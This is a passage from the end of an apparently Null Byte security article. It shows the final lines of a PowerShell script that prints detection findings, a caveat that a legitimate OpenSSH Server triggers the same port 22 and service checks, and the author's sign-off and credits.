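    'Indicators found:'
    $findings | ForEach-Object { " - $_" }
}
```

A legitimately installed OpenSSH Server will also trip the port 22 and service checks, so treat the output as a list of things to verify against what the machine is supposed to be running, not as a verdict.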

Stay vigilant. Never underestimate your worth to a hacker, and keep finding new ways to protect yourself. Follow me on Twitter @tokyoneon_ if you enjoyed this article. There are more fun hacker antics to come.


Cover photo by Tinh Khuong; Screenshots by tokyoneon/Null Byte



